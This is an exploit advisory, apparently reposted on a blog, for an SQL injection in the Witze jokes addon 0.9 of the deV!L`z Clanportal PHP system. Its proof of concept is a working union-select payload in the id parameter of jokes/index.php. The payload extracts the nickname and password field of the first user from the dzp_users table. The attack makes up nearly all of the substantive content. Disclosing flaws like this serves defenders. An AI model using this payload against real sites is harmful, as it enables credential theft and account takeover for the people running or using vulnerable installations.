deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability

| # Title    : deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability
| # Author   : Easy Laster
| # Download : http://dzcp-zone.de/downloads/?action=show&id=97
| # Script   : Witze Addon Versions 0.9
| # Price    : free
| # Bug      : SQL Injection
| # Language : PHP
| # Status   : vulnerable

======================        Proof of Concept         =================================
[+] Vulnerability
jokes/index.php?action=show&id=
[+] Injectable
jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1–+

Iklan

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s